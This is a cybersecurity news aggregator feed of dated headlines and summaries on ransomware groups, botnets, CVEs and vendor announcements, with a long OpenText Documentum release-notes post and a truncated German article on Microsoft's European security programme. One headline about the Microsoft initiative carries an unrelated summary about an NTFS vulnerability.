Official Juniper Networks Blogs Segunda etapa del camino a la red autónoma: información valiosa En nuestra publicación anterior, analizamos la primera etapa del camino a la Self-Driving Network™: los datos. Si bien los datos constituyen los pilares fundamentales de las redes inteligentes, por sí solos, no sirven The post Segunda etapa del camino a la red autónoma: información valiosa appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/es-es/spanish-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-es
Scattered Spider Hackers Target Tech Company Help-Desk Administrators
2025-06-06T14:18:00Z | 1749219480

A newly identified wave of cyberattacks by the notorious Scattered Spider hacking group has zeroed in on help-desk administrators at major technology companies, leveraging advanced social engineering techniques to breach corporate defenses. Known for their adept use of psychological manipulation, these threat actors have demonstrated a chilling ability to exploit human vulnerabilities as effectively as […] The post Scattered Spider Hackers Target Tech Company Help-Desk Administrators appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/scattered-spider-hackers-target-tech-company/
K000139901: PyYAML vulnerability CVE-2017-18342
2025-06-06T14:06:34Z | 1749218794

Security Advisory Description In PyYAML before 5.1, the yaml.load() API could execute arbitrary code if used with untrusted data. The load() function has been deprecated in version 5.1 and the ' ...

https://my.f5.com/manage/s/article/K000139901
Off-brand IoT devices are still vulnerable to BadBox botnet, FBI says
2025-06-06T14:01:49Z | 1749218509

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

https://therecord.media/iot-devices-vulnerable-to-badbox-botnet-fbi
Off-brand IoT devices are still vulnerable to BadBox botnet, FBI says
2025-06-06T14:01:49Z | 1749218509

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

https://therecord.media/iot-devices-vulnerable-to-badbox-botnet-fbi
Off-brand IoT devices are still vulnerable to BadBox botnet, FBI says
2025-06-06T14:01:49Z | 1749218509

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

https://therecord.media/iot-devices-vulnerable-to-badbox-botnet-fbi
Synthetic Data Is Here to Stay, but How Secure Is It?
2025-06-06T14:00:00Z | 1749218400

Synthetic data offers organizations a way to develop AI while maintaining privacy compliance but requires careful management to prevent re-identification risks and ensure model accuracy.

https://www.darkreading.com/vulnerabilities-threats/synthetic-data-security
Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
2025-06-06T14:00:00Z | 1749218400

The ransomware group combines IT vendor impersonation and phishing frameworks like Evilginx to breach its targets

https://www.infosecurity-magazine.com/news/scattered-spider-tech-vendor/
Read This Before Adopting AI
2025-06-06T14:00:00Z | 1749218400

How to keep your data safe before activating tools like Copilot

https://www.security.com/expert-perspectives/read-adopting-ai
What’s new in OpenText Documentum Content Management
2025-06-06T14:00:00Z | 1749218400

Customers trust OpenText™ Documentum™ Content Management (CM) to help them ensure their high volume, critical business content is secure, organized, preserved and easily accessible while adhering to privacy and security protocols. Documentum users are also extending the value of their content to the cloud, simplifying access for content creation and collaboration, driving productivity improvements with easy-to-understand and personalized user experiences, all while applying Documentum’s robust governance at every stage of the content lifecycle. June 2025: What's new in OpenText Documentum CE 25.2 The release of OpenText™ Documentum™ Content Management (CM) CE 25.2 is a game-changer, introducing a robust set of features to elevate productivity, strengthen security, and simplify workflows. This update focuses on five critical areas: enhanced user experience, modernization and migration, powerful business application integrations, improved governance, and AI-driven workflow insights. Let’s explore how these updates can transform your content ecosystem.  A next-gen user experience that boosts efficiency  CE 25.2 redefines user interaction with a sleek, intuitive interface designed for ease of use. The new rich text editor simplifies content creation, while features like the recycle bin prevent accidental data loss. Workflow visual indicators provide instant clarity on document status, and enhanced viewing capabilities support multiple rendition formats, ensuring seamless access to content. These updates cut down on training time and empower users to work more efficiently, making daily tasks feel effortless.  Modernization and migration made seamless Upgrading to CE 25.2 is now a breeze, thanks to smarter migration tools. Search migration efficiencies slash downtime, and optimized HELM charts reduce manual errors during deployment. With certification for Java 21 and Microsoft Azure HSM encryption, the platform ensures secure operations and compliance, especially for regulated industries. These enhancements make transitions smoother, letting organizations modernize without the usual headaches.  Powerful integrations for enhanced collaboration Collaboration gets a major boost with CE 25.2’s seamless integrations. The improved Microsoft® 365 Teams integration enables co-authoring of OpenText Documentum CM content directly within Teams, fostering real-time teamwork. Additionally, CMIS API extensions allow effortless connectivity with systems like SAP® S/4HANA, creating a unified content ecosystem. These integrations break down silos, ensuring your teams can work together efficiently across platforms.  Stronger governance to safeguard your data Security and compliance remain top priorities in CE 25.2. Integration with Microsoft Purview, introduced last release, now supports sensitivity labels with user-defined permissions, and protected mail search, giving you tighter control over sensitive data. These governance features help organizations meet stringent regulatory requirements while protecting critical information, ensuring peace of mind in an increasingly complex digital landscape. Available only with containerized OpenText Documentum CM deployments. AI-driven workflow insights for smarter decisions  The introduction of AI-driven workflow insights sets CE 25.2 apart. With OpenText Content Aviator, users gain access to intelligent summaries and risk flagging at every workflow stage, enabling faster, data-driven decisions. AI-drafted reports further streamline processes by reducing manual effort, allowing teams to focus on high-value tasks. This intelligent automation enhances productivity and positions organizations to stay ahead of the curve.  Conclusion: A smarter, more efficient content ecosystem OpenText Documentum Content Management CE 25.2 isn’t just an update—it’s a transformative leap forward. By prioritizing user experience, seamless modernization, robust integrations, stringent governance, and AI-powered insights, this release equips organizations to manage content more effectively, securely, and intelligently. Whether you’re looking to boost collaboration, ensure compliance, or leverage AI for smarter workflows, CE 25.2 delivers the tools you need to thrive in today’s fast-paced digital world. Ready to streamline your content ecosystem? This is the upgrade you’ve been waiting for.  December 2024: What's new in OpenText Documentum CE 24.4 OpenText Documentum Content Management (CM) CE 24.4 introduces significant enhancements designed to extend the value of your current system by delivering the right functionality to the right users at just the right moment.  The main improvements in this release are listed below: Delight users with instant access to content using biometric authentication It does not matter if your users favor an Android or Apple smartphone, they are used to having access instant access using biometrics.  Why should it be any different when they need to access content on-the-go?  Now users can enable login via biometrics using the OpenText Documentum CM Mobile app settings. Biometric authentication provides the following benefits: Enhanced security - Biometric authentication uses unique traits (e.g., fingerprints, facial recognition, voice) to enhance security over traditional passwords. Convenience - Users no longer need to remember or manage complex passwords, as biometric methods allow quick and effortless access with a simple scan or gesture. Personalized experience - Ties access directly to an individual, ensuring a seamless and tailored user experience without the need for additional verification steps. Versatility across devices – Support for Apple smartphones and Android smartphones offers a consistent and familiar method across multiple platforms. Give users an intelligent assistant right at their fingertips OpenText Content Aviator can now be used to expand the value of your business content and lighten your users’ daily workload in the cloud and off-cloud.  Gone are the days of manually summarizing content, creating detailed bullet lists, tabulating lists, identifying risks or creating draft plans based on content stored in various folders.  The intelligent assistant puts chat-based conversational search right at your employees' fingertips. With the added ability to run OpenText Documentum CM with OpenText Content Aviator off-cloud, organizations can realize the following benefits: Data privacy and security - Keeping GenAI operations on-premises/off-cloud ensures sensitive data remains completely within the organization’s control. Offline functionality - On-premises AI systems can operate without internet connectivity, ensuring uninterrupted access in environments with unreliable networks, such as remote facilities or during outages. Compliance with industry standards - For industries like finance, healthcare, or government, where regulatory requirements mandate data residency or restrict third-party access, on-premises AI ensures adherence to these rules. Seamless, consistent protection across both Microsoft® and OpenText Documentum CM environments The new integration with Microsoft Purview Sensitivity Labels provides an extra layer of information governance, compliance, and security while maintaining seamless collaboration. This will help organizations: Streamline document classification – Ensure documents stored in the repository are classified based on organizational policies. This can be completed manually by users or automatically based on metadata, content, or predefined rules. Safeguard sensitive content – Protect sensitive content even when downloaded or shared outside OpenText Documentum CM. Comprehensive document tracking with Microsoft Purview – Provide detailed tracking of how documents are accessed, modified, or shared within and outside OpenText Documentum CM using Microsoft Purview’s audit capabilities. Secure collaboration with Microsoft Teams, SharePoint and OneDrive - Enable secure integration with Microsoft Teams, SharePoint, and OneDrive, allowing users to access and collaborate on OpenText Documentum CM-stored files while maintaining security controls. Unified security with Purview Sensitivity Labels - Extend Purview Sensitivity Labels to ensure consistent classification and security policies across all repositories using OpenText Documentum CM in a hybrid environment (on-premises + cloud). Personalized efficiency for effortless content access The new OpenText Documentum Smart View features help organizations tailor content effortlessly by providing a more personalized user experience, improved workflow efficiency, and streamlined document management. The following are some of the new features in this release:   Various menu improvements (Versions, Renditions, Location, Workflow, and Relations) Enhances user experience with more intuitive navigation. Increases efficiency by reducing time spent searching for options. Improves accessibility to key document-related actions. View workflows on a per document basis Provides better visibility into document-specific workflows. Enables faster decision-making with clear workflow tracking. Reduces errors by ensuring the correct workflow is followed. Improvements to iURLs for direct file viewing Provides updates to relationship management when creating or importing documents. Aids in updating landing page changes. Filtering improvements Doclist (Show or hide folders) - Allows users to customize their view for a more focused workspace and reduces clutter by hiding unnecessary folders. Business filters for tasks on workflow overview widget - Helps users quickly find relevant tasks and enhances productivity by streamlining task management. Caching improvements Cache last folder navigation - Saves time by remembering previous locations and reduces the need for repetitive navigation. Date improvements Users can set their on date formatting (Long, short, etc.)  - Provides flexibility based on user preferences and improves clarity in international teams with different date formats. Client can show local time zone while server maintains server time zone  - Prevents confusion from time zone differences and ensures accurate time tracking across global teams. Manual import of rendition to existing documents Streamlines the process of updating documents. Reduces errors by maintaining accurate document versions. Visual indicator when a markup exists in IV Enhances visibility of document changes or annotations. Improves collaboration by ensuring markups aren’t overlooked. Multi-binder ability in IV (Concatenation of selected documents in the viewer) Enables easier document comparison and review. Saves time by allowing multiple documents to be viewed as a single entity. Enhancing integration and real-time interaction using OpenText Documentum CM SDK’s external widgets The external widget in Smart View facilitates smooth integration with external clients, providing real-time updates and interactions with independent applications. It stays visible on-screen and updates dynamically as users engage with objects. This feature eases the shift from classic to Smart View by supporting the migration of custom dashboards, welcome pages, and app integrations. Using OpenAjaxHub allows customers to repurpose existing integrations for event subscription and publishing, ensuring seamless two-way communication between Smart View and almost any component. This will help organizations: Enhanced integration – Works with any JavaScript framework supporting OpenAjaxHub, an open standard. Real-time interactivity – Allows Smart View to send and receive events, enabling two-way communication. Improved user experience – Keeps widgets accessible and updated without requiring manual refreshes. Practical use case – Example implementation with Documentum Reports, where users can trigger client events externally via the “Show Report Templates” button. Leverage the new OpenText Documentum CM Search off-cloud The new OpenText Documentum CM Search offers rapid performance tied to compute power, improved search accuracy via a machine-learning engine supporting multiple languages and advanced search types (vector and semantic), a modern web-based admin interface for remote customization, and containerized architecture for cloud scalability, compatible with various file storage integrations like NAS, SAN, CAS, and Cloud-Store/SDS. This will help organizations: Improve efficiency and productivity - Lightning-fast, compute-powered search helps employees quickly find documents, cutting search time and boosting productivity. Enhance decision-making - Machine-learning engine enhances search relevance with multi-language, vector, and semantic support, aiding accurate, context-driven decisions. Save money- Containerized, cloud-optimized architecture cuts costs with scalable integrations (NAS, SAN, CAS, Cloud-Store/SDS), reducing reliance on expensive on-premises hardware. Support global accessibility - Supports multiple languages and a web interface, enabling effective search access and collaboration for global teams. Streamlined business process structures with a fully integrated Microsoft® Teams® owner experience Gone are the days of relying on IT or Cloud Ops to manipulate complex workflows to meet the changing demands of the organizations, now business power users and administrators can easily: Unlock documents Cancel checkouts Pause a workflow Resume a workflow Abort a workflow Update a workflow supervisor BOCS: Empowering remote operations with instant, offline access to critical materials BOCS (Branch Office Caching Services) enables remote offices, such as oil rigs and mines, to instantly access the latest materials like manuals, repair instructions, and safety guides, even without network connectivity. This is achieved through containerization of OpenText Documentum CM Messaging Services (DMS), updates to Smart View and M365 for accessing cached content in BOCS, and providing instructions for BOCS access and off-cloud deployment. A few examples of business benefits are: Efficient, scalable deployment across multiple remote locations using Containerization of OpenText Documentum CM Messaging Services (DMS). Enables smooth access to cached content and ensures compatibility with existing tools and workflows. Reduce setup time and technical challenges for remote deployments by providing clear BOCS access and off-cloud deployment instructions. Deliver more insightful, actionable data Through enhanced reporting and dashboards combined with improved usability and customization options, improves usability and provides easy to customize options.  Now available as part of the OpenText Documentum CM X-Plans, the new reporting and dashboards take advantage of the modern capabilities of the Smart View client.  The new administrative toolkit includes templatized reports and dashboards. Reports are powered by templates and configurable Documentum Query Language (DQL) that aid in the creation and delivery of new reports. August 2024: What's new in OpenText Documentum CE 24.2 The OpenText Documentum CE 24.2 release includes new capabilities designed to help organizations deliver the power of Documentum throughout their organization in a more personalized manner. Accelerate content discovery through chat-based conversational search OpenText™ Content Aviator for Documentum is the intelligent assistant everyone wants because it helps users discover content faster with an interactive chat interface.  Users can quickly understand documents with automated analysis, summaries and translations.  This boosts productivity, efficiency and satisfaction by providing instant access to relevant answers to natural language questions. Improve search results with the next generation of Documentum Search The new Documentum Search provides: Lightning-fast performance that matches with compute power Enhanced search relevance through use of a machine-learning analytic engine that supports different languages, vector & semantic search A modern web administrator interface that provides effective tools to make it easier to tailor search experiences remotely Containerized for cloud-scale by supporting a variety of popular integrations of file-stores like: NAS, SAN, CAS, and Cloud-Store/SDS Keep your secrets secret with an extra layer of protection As hackers become increasingly more aggressive and smarter, Documentum is ready to help customers ensure their sensitive data is protected by creating new ways to manage access to secrets. Now, customers can configure Documentum using mapped vault keys.  By updating the vault secrets are removed from encrypted configurations files, making it even harder to access.  To bring further confidence to this solution, Documentum chose to work with the leader in the industry, HashiCorp Vault, to provide this level of security.  This is a win-win for Documentum customers and a lose-lose for bad actors. Inspire business power users and managers to take control of their work   Gone are the days of relying on IT or Cloud Ops to manipulate complex workflows to meet the changing demands of the organizations, now business power users and administrators can easily: Unlock documents Cancel checkouts Pause a workflow Resume a workflow Abort a workflow Update a workflow supervisor Enhance user productivity working with content stored in Documentum from within Microsoft Teams Expose Smart View Search and Advanced Search capabilities to users working from Teams Supports all Smart View functionality and menu options, including virtual documents and mass update Reduce administrative tasks to manage the integration via intelligent automation New automation framework for detecting changes to Team membership in Microsoft and synchronizing the Team workspace in Documentum When new members are added or deleted – the access to the mapped folder in Documentum is updated Support existing business process structures Team Owners may now choose to create a mapped team workspace in Documentum or select an existing folder/workspace Allows Team Owners to easily link existing business process pre-configured folder structures in Documentum as the workspace for a Team Help your new users navigate the mobile app with a self-paced guided tour Now OpenText Documentum Smart View mobile users can better understand how to use the mobile app by taking a self-paced guided tour with Documentum coachmarks. Coachmarks play an important role in enhancing user engagement, reducing confusion, and improving user retention rates within mobile applications. The new coachmarks present themselves as green dialogues that coach, or teach, a feature to the users with contextual information or instructions. Coachmarks can be used during onboarding when a user first launches the app. They can be used to help current users discover and understand new features designed to make it easier for the user to stay in the mobile app to complete a complex project. December 2023: What’s new in OpenText Documentum CE 23.4 OpenText is pleased to introduce OpenText Documentum CE 23.4, which we fondly refer to as ‘One Documentum’ because it brings the  power of Documentum into a single solution that helps organizations realize extended value from their Documentum system by: Inspiring collaboration and optimizing processes Simplifying deployments and upgrades Modernizing licensing  Providing end-to-end archival for mature content Introducing One Documentum: A new way to Re-IMAGINE Documentum. Inspiring collaboration and optimizing processes The new OpenText™ Extended ECM Documentum™ for Microsoft® 365 solution connects people, content and tools to keep teams engaged and productive Customer-facing teams always have access to real-time data and content to make informed decisions and deliver outstanding service to their valued clients Rights-based access and pre-defined business rules enable content stakeholders to view, edit and manage the information they need without navigating multiple systems to locate content in potentially restricted systems or areas Users can create content and collaborate in Teams, while remaining focused on the processes and goals managed by ERP, CRM and HCM applications Simplifying deployments and upgrades One-click deployment reduces upgrade time and effort Simplified certification matrix takes away the guesswork when upgrading Custom or standardized private-cloud plans to leverage Documentum as a cloud service Deploy Documentum with your own data centers or other hyperscalers Documentum™ Smart View (formerly Documentum™ D2 Smart View) users can quickly resize columns, switch between lists, pinned column and grid modes, all leveraging sticky memory to ensure their personal changes persist until the next time they need to make a change Leverage the Documentum Smart View SDK to extend and customize Documentum Smart View Migrate custom WebTop applications to Documentum Smart View Create similar Webtop customizations in Documentum Smart View Move the Classic Custom Dialog plugins with no modification or replication needed Define and layout extension/override capabilities of the out-of-the-box Documentum Smart View components Modernizing licensing Move away from the years of license pileup with a new, modern licensing structure that consolidates licenses into a single model number The new Documentum X-Plans provides discounted upgrade paths with extended functionality Providing end-to-end archival for mature content Empower external users to perform self-service transactions on secure content from anywhere with the new Documentum External Transactions license Ensure all parties are always working on the latest version of the document and can make better decisions faster, reducing the cost to the business. May 2023: What’s new in OpenText Documentum CE 23.2 With the release of OpenText™ Documentum™ CE 23.2, we’ve made improvements across the platform to enhance the user experience, automate workflows, and ensure compliance. Here’s a glance at a few of the new features in 23.2:   Augment productivity in D2 Smart View   Documentum D2 Smart View users can quickly resize columns, switch between lists, pinned column and grid modes, all leveraging sticky memory to ensure their personal changes persist until the next time they need to make a change.  Customize the UI to empower and delight users  Leverage the Documentum D2 Smart View SDK to extend and customize D2 Smart View.  Migrate custom WebTop applications to D2 Smart View.  Create similar Webtop customizations in D2 Smart View.  Move D2 Classic Custom Dialog plugins with no modification or replication needed.  Define and layout extension/override capabilities of the out-of-the-box D2 Smart View components.   Engage external users at every step of the process  Empower external users to perform self-service transactions on secure content from anywhere with the new Documentum External Transactions license  Ensure all parties are always working on the latest version of the document and can make better decisions faster, reducing the cost to the business.  Augment productivity in D2 Smart View with column resize.  June 2022: What’s new in OpenText Documentum CE 22.2 With the release of OpenText Documentum CE 22.2, we’ve made improvements across the platform to enhance the user experience, automate workflows, and ensure compliance. Here’s an overview of what’s new in CE 22.2: Enhance user experiences Modern work calls for new tools and new ways of thinking about Information Management. The new in-place viewing and Docmerge capabilities of OpenText™ Documentum™ D2 help enhance modern work by making it easier for users to complete their work from a single location without the need to switch back and forth between content stored in various locations. Now users can: Preview, review and compare document properties and content in a single view Adjust the viewing area for the size that best suits the current task Quickly compare text on a document from one version to another Compare drafts of CAD drawings by toggling between a view of each drawing individually, showing drawings side-by-side or overlaying them with or without differences being contrasted An example of the in-place viewing on the properties page in OpenText Documentum D2 An example of how Documentum allows users to quickly compare text changes from one version to another Automate workflows OpenText Documentum Advanced Workflow is a new workflow designer that allows organizations to bring the power of OpenText™ Documentum™ xCP workflows to the applications of choice without the need for UI composition. This allows the users to remain in the applications they use the most while leveraging advanced workflows for content processing.    An example of how users can create process-driven applications without implementing a new user interface within Documentum xCP Enhance compliance with digital signatures Documentum D2 and D2 Mobile’s holistic integration with OpenText™ Core Signature ensures compliance by providing an ink-like digital signature as part of any D2 workflow. The signed documents are automatically retrieved back into Documentum where they are stored and logged with the required audit details using pre-configured business rules as required by the governing regulations. An example of Documentum D2 and D2 Mobile integration with OpenText Core Signature. November 2021: What’s new in OpenText Documentum CE 21.4 Update 1: Design and manage workflows The new web-based Workflow Designer provided with the Documentum Platform can be used for designing and managing D2 workflows. Current Documentum customers can migrate their workflows from Workflow Manager using the migration utility. Update 2: Access Salesforce information Documentum’s new integration with Salesforce® helps accelerate sales cycles by sharing content stored in Documentum directly from the Salesforce user interface. Users avoid miscommunication and improve the customer experience by always leveraging the most current Salesforce information. Organizations can rest assured their content will not be misused, since the content carries with it the enterprise security and compliance standards built into Documentum. Update 3: Simplify access to lifecycle management Documentum D2 Smart View users can now apply lifecycle changes to a document in Smart View based on their user privileges. Business rules are consistently and automatically applied to documents as they progress through the various states of the document’s lifecycle. Update 4: Update en masse Merger and acquisition activity and drug-status changes for Life Sciences companies are examples of use cases that often require mass updates to be made to documents, folders and virtual documents. To ensure these changes are made consistently and quickly, Documentum D2 updates properties on multiple objects in one action. This includes replacing attributes based on conditions of other fields. Update 5: Do more when mobile Documentum D2’s new mobile capabilities include: QR code scanning Relations management, for creating and viewing relations Document lifecycle management Viewing and working on checked-out documents via tile landing pages and the hamburger menu of the mobile device e-Signature support in key areas such as task processing, lifecycle, versioning, properties and non-credential IDP Added security and compliance with e-Sign during task processing, lifecycle management and versioning or editing properties Working/supporting files and task notes added directly by clicking on the add button in the app header Update 6: Easily create an attractive dashboard Documentum xCP Case Management Framework assists in building Smart Applications. When designing and implementing a mortgage application process, for example, the new tiles and dashboard layout improve interaction and usability, provide better access to data and increase productivity with a modern interface and organized workspace.  Developers can easily create dashboards with the xCP Tile Layout Widget. Tiles provide interactive links to Data Services or any URL and can also link to common application functionality to create a dashboard menu that enhances the user experience.  April 2021: What’s new in OpenText Documentum CE 21.2 Update 1: Improve productivity Authored content with tracked changes is often converted to PDF for submission and approval workflows—but that usually means the record of document modifications is lost. Content Transformation Services now retains comments and tracked changes when Word Documents are converted to PDFs, allowing for complete lossless interaction and change management. Additionally, Documentum Content Trusted Services can also now burn watermark text into video content for copyright purposes. Update 2: Enhanced online and offline workflow management Smart View users can now start workflows and insert their documents into pre-defined business processes. They can find and manage workflows, either their own or workflows started/belonging to others, and then pause, abort or provide an update to the workflow supervisor. Workflow features extend to the free Documentum D2 Mobile App, where users can continue to work on documents offline, then initiate workflows for approvals and processing once back online. Update 3: Streamlined Microsoft Teams collaboration Microsoft Teams users will be delighted with the ability to quickly spin up new Teams through content stored and governed in Documentum. They’ll also have the ability to clean up the Teams space post collaboration by automatically moving all content in the space to Documentum in order to prevent content sprawl. This new functionality simplifies and streamlines the complete collaboration lifecycle, from creation of a Teams site using content stored and governed in Documentum, through to checking files back into Documentum upon completion of the activity in Teams November 2020: What’s new in OpenText Documentum CE 20.4 Update 1: Documentum Platform security improvements Security improvements include mandatory events, to ensure multiple logins and failed login attempts are tracked, especially if they are from different locations. And two-man oversite of audit trails eliminates the risk of accidental or malicious tampering by a super-user. For customers moving to the cloud, an update calculator is now included with the containerized release to help customers manage the cost and impact of a container update. New certifications include Azure blob storage to help reduce the costs of storing content in Azure. Update 2: Documentum D2 enhancements In Documentum D2, we continue to focus on enhancing the Smart View to work more intuitively and across more use cases. For users, the new in-place viewer provides a seamless way to preview content without having to exit their current working environment. For Administrators, the D2-Config application can now be used with Google Chrome—a popular feature request from customers. Documentum D2 Mobile, the free mobile app for Documentum D2 customers, now allows users to scan barcodes for immediate access to the latest information. Workflow tasks can now be accessed from the home screen and can be actioned to speed up workflows. Update 3: Documentum xCP case management Documentum xCP CE 20.4 simplifies the development of dynamic, case-management solutions by enhancing the OOTB (Out of the Box) application that stands as the starting point for mapping to specific processes. The new Case Management Framework assists in building Smart Applications using enhancements in the OOTB starting-point application—including the ability to search custom objects, sort results dynamically, and import task attachments from local file systems. All of which enables faster implementation cycles. The post What’s new in OpenText Documentum Content Management appeared first on OpenText Blogs.

https://blogs.opentext.com/whats-new-in-opentext-documentum-content-management/
New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution
2025-06-06T13:58:47Z | 1749218327

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices. This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations. Exploitation Vector & Payload Delivery Attackers exploit the vulnerability […] The post New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/mirai-variant-exploits-tbk-dvr-flaw/
Microsoft Unveils European Security Effort to Disrupt Cybercrime Networks
2025-06-06T13:58:42Z | 1749218322

A critical heap-based buffer overflow vulnerability, tracked as CVE-2025-24993, has been discovered in the Windows New Technology File System (NTFS), posing a significant threat to millions of Windows users globally. The flaw, patched during Microsoft’s March 2025 Patch Tuesday, was actively exploited as a zero-day in the wild, prompting urgent advisories from both Microsoft and […] The post Microsoft Unveils European Security Effort to Disrupt Cybercrime Networks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/microsoft-unveils-european-security-effort/
ViperSoftX Malware Used by Threat Actors to Steal Sensitive Information
2025-06-06T13:54:02Z | 1749218042

The AhnLab Security Intelligence Center (ASEC) has recently issued a detailed report confirming the persistent distribution of ViperSoftX malware by threat actors, with notable impact on users in South Korea and beyond. First identified by Fortinet in 2020, ViperSoftX is a sophisticated PowerShell-based malware designed to infiltrate infected systems, execute remote commands, and steal sensitive […] The post ViperSoftX Malware Used by Threat Actors to Steal Sensitive Information appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/vipersoftx-malware-used-by-threat-actor/
Critical Fortinet flaws now exploited in Qilin ransomware attacks
2025-06-06T13:53:40Z | 1749218020

The Qilin ransomware operation has recently joined attacks exploiting two Fortinet vulnerabilities that allow bypassing authentication on vulnerable devices and executing malicious code remotely.

https://www.bleepingcomputer.com/news/security/critical-fortinet-flaws-now-exploited-in-qilin-ransomware-attacks/
NICKNAME: Zero-Click iMessage Exploit Targeted Key Figures in US, EU
2025-06-06T13:43:59Z | 1749217439

iVerify’s NICKNAME discovery reveals a zero-click iMessage flaw exploited in targeted attacks on US & EU high-value individuals…

https://hackread.com/nickname-zero-click-imessage-exploit-figures-us-eu/
Marks & Spencer’s ransomware nightmare – more details emerge
2025-06-06T13:42:21Z | 1749217341

Over Easter, retail giant Marks & Spencer (M&S) discovered that it had suffered a highly damaging ransomware attack that left some shop shelves empty, shut down online ordering, some staff unable to clock in and out, and caused some of its major suppliers to resort to pen and paper. In a gloating abuse-filled email to M&S CEO Stuart Machin, the DragonForce hacker group claimed responsibility for the attack. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/marks-spencers-ransomware-nightmare-more-details-emerge
Empower Users and Protect Against GenAI Data Loss
2025-06-06T13:41:00Z | 1749217260

When generative AI tools became widely available in late 2022, it wasn’t just technologists who paid attention. Employees across all industries immediately recognized the potential of generative AI to boost productivity, streamline communication and accelerate work. Like so many waves of consumer-first IT innovation before it—file sharing, cloud storage and collaboration platforms—AI landed in...

https://thehackernews.com/2025/06/empower-users-and-protect-against-genai.html
Uncle Sam moves to seize $7.7M laundered by North Korean IT worker ring
2025-06-06T13:14:53Z | 1749215693

The cash has been frozen for more than two years The US is looking to finally capture the $7.74 million it froze over two years ago after indicting alleged money launderers it claims are behind North Korean IT worker schemes.

https://go.theregister.com/feed/www.theregister.com/2025/06/06/north_korea_it_worker_cash/
Microsoft Helps CBI Dismantle Indian Call Centers Behind Japanese Tech Support Scam
2025-06-06T13:12:00Z | 1749215520

India's Central Bureau of Investigation (CBI) has revealed that it has arrested six individuals and dismantled two illegal call centers that were found to be engaging in a sophisticated transnational tech support scam targeting Japanese citizens. The law enforcement agency said it conducted coordinated searches at 19 locations across Delhi, Haryana, and Uttar Pradesh on May 28, 2025, as part of...

https://thehackernews.com/2025/06/microsoft-helps-cbi-dismantle-indian.html
Microsoft startet neues europäisches Sicherheitsprogramm
2025-06-06T13:02:21Z | 1749214941

Microsoft will die Cybersicherheit in Europa stärken.MeshCube – shutterstock.com Microsoft warnt davor, dass sich Ransomware-Gruppen und staatlich geförderte Akteure aus Russland, China, dem Iran und Nordkorea in Umfang und Raffinesse stetig weiterentwickeln. Europa dürfe daher nicht zögern, seine Verteidigungsmechanismen zu stärken. Der Tech-Konzern will deshalb mit einer neuen Initiative bestehende Schutzprogramme erweitern und gezielt auf europäische Bedürfnisse eingehen. Das Europäische Sicherheitsprogramm besteht laut Microsoft aus drei zentralen Maßnahmen: Verstärkter Austausch von KI-gestützten Bedrohungsanalyse mit europäischen Regierungen; Gezielte Investitionen in die Stärkung von Cybersicherheitskapazitäten und Widerstandsfähigkeit; Ausbau von Partnerschaften, um Cyberangriffe effektiver zu stören und kriminelle Netzwerke zu zerschlagen. Das kostenfreie Angebot richtet sich an alle 27 Mitgliedstaaten der Europäischen Union (EU) sowie an EU-Beitrittskandidaten, Länder der Europäischen Freihandelsassoziation (EFTA), Großbritannien, Monaco und den Vatikan. “Dieses neue Programm erweitert die geografische Reichweite unserer bestehenden Arbeit und fügt neue Elemente hinzu, die für den Schutz Europas von entscheidender Bedeutung sein werden”, erklärte Brad Smith, Präsident und Vice Chair von Microsoft, bei der Vorstellung des Programms in Berlin. “Es stellt KI in den Mittelpunkt als Instrument zum Schutz traditioneller Cybersicherheitsanforderungen und stärkt die digitale und KI-Infrastruktur.” Lesetipp: Neue EU-Schwachstellen-Datenbank geht an den Start Aktuelle Cyberbedrohungslage Microsofts aktuelle Analysen zeigten, dass staatlich geförderte Cyberangriffe zunehmen. Demnach haben es besonders russische und chinesische Akteure auf europäische Netzwerke abgesehen. Russland konzentriere sich dabei weiterhin vor allem auf die Ukraine sowie auf Länder, die das Land militärisch oder politisch unterstützen, stellt der Microsoft-Präsidentfest. Zudem würden Hackergruppen aus dem Iran und Nordkorea gezielt Spionage-Angriffe starten, etwa durch den Diebstahl von Zugangsdaten oder das Ausnutzen von Sicherheitslücken. Microsoft zufolge geraten dabei zunehmend Forschungseinrichtungen und Think Tanks ins Visier von Cyberspionage-Kampagnen. Doch nicht nur staatliche Akteure bedrohen den Cyberraum: Die Entwicklung von Ransomware-as-a-Service hat laut Microsoft eine regelrechte Schattenwirtschaft entstehen lassen. „Wir beobachten das Aufkommen illegaler Websites, die schnell an Popularität gewinnen, indem sie Erkenntnisse über Ransomware weitergeben. Kriminelle Gruppen nutzen diese für Angriffe in ganz Europa“, so Smith. Darüber hinaus verstärkt und entwickelt der Aufstieg der KI auch das Verhalten von Bedrohungsakteuren. Microsoft hat die Verwendung von KI durch Bedrohungsakteure für Aufklärung, Vulnerabilitätsforschung, Übersetzung, LLM-refined operative Befehlstechniken, Ressourcenentwicklung, Skripttechniken, Umgehung von Erkennungsmassnahmen, Social Engineering und Brute-Force-Angriffe beobachtet. Deshalb verfolge der Konzern jetzt jede bösartige Verwendung neuer KI-Modelle und verhindere proaktiv, dass bekannte Bedrohungsakteure seine KI-Produkte verwenden. „Dies unterstreicht auch die Bedeutung der sicheren Entwicklung und des rigorosen Testens von KI-Modellen, die Nutzung von KI zugunsten von Cyber-Verteidigern und die Schließung öffentlich-privater Partnerschaften, um die neuesten Erkenntnisse über KI und Cybersicherheit zu teilen“, betont der Microsoft-Vize. Echtzeitinformationen über nationale Bedrohungslagen Das Unternehmen stellt im Rahmen des Programms gezielt aufbereitete Bedrohungsinformationen bereit, die auf 